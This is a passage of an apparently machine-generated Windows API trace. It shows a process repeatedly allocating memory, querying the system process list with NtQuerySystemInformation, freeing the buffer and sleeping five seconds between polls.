Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.254] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.254] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.256] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.256] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.256] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.256] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.257] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.260] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.261] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.264] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.264] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.265] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.265] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.265] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.270] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.271] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.272] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.273] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.273] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.274] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.274] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.277] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.278] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.280] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.280] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.280] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.281] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.284] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.285] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.286] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.287] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.287] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.287] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.287] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.294] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.295] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.296] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.296] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.297] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.297] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.297] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.301] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.301] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.303] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.303] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.304] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.304] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.304] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.308] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.309] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.310] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.310] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.311] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.311] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.312] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.347] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.348] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.350] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.350] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.351] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.351] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.352] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.355] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.356] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.357] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.357] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.358] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.358] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.358] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.361] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.362] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.364] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.364] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.364] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.364] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.365] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.368] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.369] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.370] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.371] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.371] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.371] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.372] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.375] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.375] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.377] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.377] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.377] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.378] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.378] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.381] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.382] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.383] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.384] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.384] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.384] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.384] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.388] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.389] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.390] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.390] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.391] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.391] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.391] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.394] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.395] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.396] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.397] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.397] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.398] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.398] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.401] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.402] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.403] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.404] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.404] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.404] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.405] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.408] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.409] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.411] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.411] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.412] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.412] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.412] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.424] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.425] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.426] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.427] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.428] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.428] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.428] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.432] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.432] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.434] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.434] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.435] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.435] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.435] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.440] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.440] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.442] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.442] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.443] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) 